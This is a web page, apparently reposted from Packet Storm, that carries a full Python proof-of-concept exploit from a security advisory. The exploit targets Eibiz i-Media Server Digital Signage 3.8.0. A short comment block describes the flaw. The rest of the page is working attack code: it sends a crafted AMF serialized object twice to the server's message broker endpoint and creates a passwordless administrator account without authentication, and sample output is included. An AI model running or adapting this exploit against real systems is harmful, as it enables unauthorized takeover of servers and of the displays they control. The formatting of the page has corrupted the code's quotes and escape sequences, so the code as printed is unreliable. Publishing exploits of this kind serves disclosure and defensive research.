Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 22nd, 2020 📆 | 7444 Views ⚑

0

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass ≈ Packet Storm

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: < =3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called “Digital Signage”. Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# –Sending serialized object…
# –Replaying…
#
# ——————————————————
# Admin user ‘waddup’ successfully created. No password.
# ——————————————————
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:

def __init__(self):
self.ep = “/messagebroker/amf”
self.agent = “CharlieChaplin”
self.amfpacket = None
self.bytecount = None
self.bytesdata = None
self.address = None
self.headers = None
self.usrname = None
self.ende = None

def usage(self):
if len(sys.argv) != 3:
self.me()
msg = “x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin”
brd = “-” * len(msg + “x20”)
print(“n” + brd)
print(msg)
print(“x20Usage: ./i-media.py [ip] [username]”)
print(brd)
exit(12)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
if not “http” in self.address:
self.address = “http://{}”.format(self.address)

def amf(self):
self.headers = {“User-Agent” : self.agent,
“Accept” : “*/*”,
“Accept-Language” : “en-US,en;q=0.5”,
“Accept-Encoding” : “gzip, deflate”,
“Origin” : self.address,
“Connection” : “close”,
“Referer” : self.address + “/main.swf”,
“Content-Type” : “application/x-amf”}

self.amfpacket = b”x00x03x00x00x00x01x00x04x6E”
self.amfpacket += b”x75x6Cx6Cx00x03x2Fx33x36x00″
self.amfpacket += b”x00x01xB3x0Ax00x00x00x01x11″
self.amfpacket += b”x0Ax81x13x4Fx66x6Cx65x78x2E”
self.amfpacket += b”x6Dx65x73x73x61x67x69x6Ex67″
self.amfpacket += b”x2Ex6Dx65x73x73x61x67x65x73″
self.amfpacket += b”x2Ex52x65x6Dx6Fx74x69x6Ex67″
self.amfpacket += b”x4Dx65x73x73x61x67x65x0Dx73″
self.amfpacket += b”x6Fx75x72x63x65x13x6Fx70x65″
self.amfpacket += b”x72x61x74x69x6Fx6Ex13x74x69″
self.amfpacket += b”x6Dx65x73x74x61x6Dx70x09x62″
self.amfpacket += b”x6Fx64x79x11x63x6Cx69x65x6E”
self.amfpacket += b”x74x49x64x0Fx68x65x61x64x65″
self.amfpacket += b”x72x73x15x74x69x6Dx65x54x6F”
self.amfpacket += b”x4Cx69x76x65x17x64x65x73x74″
self.amfpacket += b”x69x6Ex61x74x69x6Fx6Ex13x6D”
self.amfpacket += b”x65x73x73x61x67x65x49x64x01″
self.amfpacket += b”x06x15x63x72x65x61x74x65x55″
self.amfpacket += b”x73x65x72x04x00x09x03x01x0A”
self.amfpacket += b”x81x73x1Bx64x73x2Ex6Dx6Fx64″
self.amfpacket += b”x65x6Cx2Ex55x73x65x72x11x70″
self.amfpacket += b”x61x73x73x77x6Fx72x64x0Dx63″
self.amfpacket += b”x72x65x61x74x65x07x74x65x6C”
self.amfpacket += b”x07x66x61x78x09x6Ex61x6Dx65″
self.amfpacket += b”x0Fx61x64x64x72x65x73x73x0D”
self.amfpacket += b”x75x70x64x61x74x65x05x69x64″
self.amfpacket += b”x0Dx6Dx6Fx62x69x6Cx65x0Fx75″
self.amfpacket += b”x44x65x6Cx65x74x65x15x64x65″
self.amfpacket += b”x70x61x72x74x6Dx65x6Ex74x09″
self.amfpacket += b”x72x6Fx6Cx65x09x72x65x61x64″
self.amfpacket += b”x0Bx65x6Dx61x69x6Cx0Fx63x6F”
self.amfpacket += b”x6Dx70x61x6Ex79x06x01x03x06″
self.amfpacket += b”x01x06x01x06″ ##################”
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.amfpacket += “”.join(map(chr, self.bytesdata))
self.amfpacket += (bytes(self.usrname.encode(“utf-8”)))
self.amfpacket += b”x06x01x03x06x36x06x01x03x06″
self.amfpacket += b”x01x06x1Bx41x64x6Dx69x6Ex69″
self.amfpacket += b”x73x74x72x61x74x6Fx72x03x06″
self.amfpacket += b”x01x06x01x01x0Ax0Bx01x15x44″
self.amfpacket += b”x53x45x6Ex64x70x6Fx69x6Ex74″
self.amfpacket += b”x06x0Dx6Dx79x2Dx61x6Dx66x09″
self.amfpacket += b”x44x53x49x64x06x49x39x36x42″
self.amfpacket += b”x30x42x46x38x43x2Dx41x31x31″
self.amfpacket += b”x41x2Dx38x41x32x34x2Dx38x31″
self.amfpacket += b”x43x31x2Dx35x38x37x45x41x33″
self.amfpacket += b”x41x43x41x33x38x43x01x04x00″
self.amfpacket += b”x06x17x75x73x65x72x53x65x72″
self.amfpacket += b”x76x69x63x65x06x49x39x39x46″
self.amfpacket += b”x45x43x43x46x39x2Dx34x41x38″
self.amfpacket += b”x44x2Dx46x46x34x31x2Dx31x41″
self.amfpacket += b”x36x36x2Dx42x46x39x31x32x45″
self.amfpacket += b”x42x42x44x36x35x36″ ##########”

print(“n–Sending serialized object…”)
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode(“utf-8”))
go.sleep(2)
print(“–Replaying…”)
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode(“utf-8”))
self.ende = “Admin user ‘” + self.usrname + “‘ successfully created. No password.”
print
print(“-” * len(self.ende))
print(self.ende)
print(“-” * len(self.ende))

def me(self):
cc = “””

/`,.,,,.
:…….,,
,………7
,………$
……:=+=$
I…..,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N……,..$=77:+?=~8
:……,::=.I8?:+=.=+~++
=…….,:+$=+O:+==~~++++=
8………..~7D$::~..~====:++
I………….:+…..~~~=~:~+?
N,…………. .+…,:~=+~~ :+=$
;……. ……, .,….,:=+:,..~=?
Z,,…… :…………,::~~=…===I
=…….$ Z…… =~,,,,.,:~,…,7~=
+……. 8…..,.=~~~:.~~~=:~ ..:$==
,…… +,..,,:.=~:~+I:,+I=8:…=?~
,….., =…,,,8+=,:~=~I=~~ N…:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8…… ,…7=Z$DN:?::=I~~$ =..,=+
…,..D ,….O88D,8D,:=:==+?? …,:7
,….7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
……8D .. …. :?~8D:.:~~=++ ..,~II
:….~D+: . . . ..,..==~===N +,.,=$
,. DDND………. .,…,===+=N ..,+?Z
DD 88 ………. ….,..~+=~N ..,~?I
……. ,,.,,.:…=?? 8..~=I$
……. …,,,,. ,:~= ..:=~?
…….. ,.,,..,:.. I.:+?+D
……. …….,:,,8 ,..IN
…….. .,.. ..,,:.: :8N
…….. … ..,::,, I+O
…….. ……,:,. O.ZN
…….. . . …,,,,. D+
………… ….,,,. =
……. . ….,,, ?
……. …..,,, 7
…… . ..,,,, +
:….. ..,.,, 8
:……. =. …..,,,N 8
~……. D. …..,,,D 8
~……. D. . …,,,O D
=…. …..,,Z ?`
+…… . :……..,.$ +
I…… ……..,.7 =
Z…….. . . ….,,7 D
N….. … . ……..I 8
….. … , ……..I 8
…… . = .. …..I 7
:.. . ..7 8… …..I ?
Z.. D .. ….7 N NND88OOOOOOO88DN
O.. . .. ….O O D8OZ$77II777$$ZO8DN
… . .. . …..N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ….O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. …88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
… … ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
… .?, I777IIIIIIIII7$~O8N NNNNN
8…. .I. …7IIIIII7$Z8DD NNNNN
NND=….~,=~ …+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=… … $O.. . …~:..=IINN $NNN
?,:..:,.=N I…..,,=I+ N8
~….,8

“””

j = 0
while j < len(cc):
char = cc[j]
sys.stdout.write(char)
go.sleep(10.0 / 100000.0)
j = j + 1

def main(self):
self.usage()
self.amf()

if __name__ == ‘__main__’:
__CreateAdmin__().main()

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...